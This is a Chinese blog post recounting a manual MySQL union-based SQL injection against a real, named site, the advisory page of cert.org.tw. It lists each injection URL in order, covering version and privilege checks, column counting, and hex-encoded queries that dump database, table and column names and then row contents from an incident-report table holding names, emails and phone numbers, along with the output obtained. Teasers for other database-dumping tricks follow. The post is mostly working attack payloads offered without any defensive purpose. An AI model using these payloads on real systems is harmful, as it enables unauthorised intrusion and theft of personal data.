记暴库高级方法讲解

原创 2011年07月05日 21:39:39
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询

2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--

3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--

数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。

4.判断有没有写权限
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限

没办法,手动猜表啦


5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb

6.爆表,爆的是twcert库
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
爆出如下表
downloadfile,irsys,newsdata,secrpt,secrpt_big5


7.爆列名,这次爆的是irsys表
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
爆出如下列
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status

8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--

返回是3,说明每个列里有3个地段

9.爆字段内容
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
爆出name列的第一个字段的内容

http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
爆出name列的第二个字段的内容
版权声明:本文为博主原创文章,未经博主允许不得转载。

高级暴库方法讲解

  • 2011年10月04日 15:33
  • 3KB
  • 下载

菜鸟也来学渗透——MySql暴库

http://www.2cto.com/Article/201305/212036.html 暴库之前看看MySql这些版本的特性吧 4.0以下不支持union查询 4.0以上m...

conn.asp暴库法原理及应用

conn.asp暴库,这个方法已经是个很老的方法了,它是通过直接访问数据库连接文件conn.asp使服务器产生错误,通过返回的错误信息从而暴出数据库的绝对路径,在这里conn.asp是指数据库连接文件...

Access利用%5c构造一级目录暴库

来源:http://www.tibetanlama.com/new/teaching_detail_for_non_members.asp?id=213关于%5c的暴库利用想已经不是什么新技术了,原因...
  • asli33
  • asli33
  • 2011年03月16日 15:05
  • 768

C++多核高级编程 - 06 并发任务的通信和同步(3) 线程的策略方法及工作的分解和封装

一 , 线程的策略方法 线程的策略决定了在将应用程序线程化时可能使用的方法。方法决定了被线程化的应用程序如何将它的工作委派给任务及通信如何进行。 常见的模型: 委托(boss-worke...

R语言处理缺失数据的高级方法

主要用到VIM和mice包 install.packages(c("VIM","mice"))

apue2.h找不到 处理方法 《unix环境高级编程》

1.APUE2源代码下载:http://www.apuebook.com/src.tar.gz2.我保存到了/root下.解压缩:tar -xzvf src.tar.gz3.cd apue.2e进...

R语言处理缺失数据的高级方法

R语言处理缺失数据的高级方法 标签: R 2014-07-02 21:14 5436人阅读 评论(0) 收藏 举报  分类: R(63)  目录(?)[+] 主要用到VIM...

《Spring Security3》第五章第四部分翻译(方法安全的高级知识和小结)

方法安全的高级知识 方法安全的表现力不仅局限于简单的角色检查。实际上,一些方法安全的注解能够完全使用Spring表达式语言(SpEL)的强大功能,正如我们在第二章中讨论URL授权规则所使用的那样。这...
  • ggmmsoo
  • ggmmsoo
  • 2014年12月26日 11:45
  • 236

flash代码改变元件亮度、色调、高级、透明度的方法

通过Color类来改变影片颜色 亮度:(设置影片明暗效果) import com.common.motion.Color;//继承ColorTransform var color:Color = ne...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:记暴库高级方法讲解
举报原因:
原因补充:

(最多只允许输入30个字)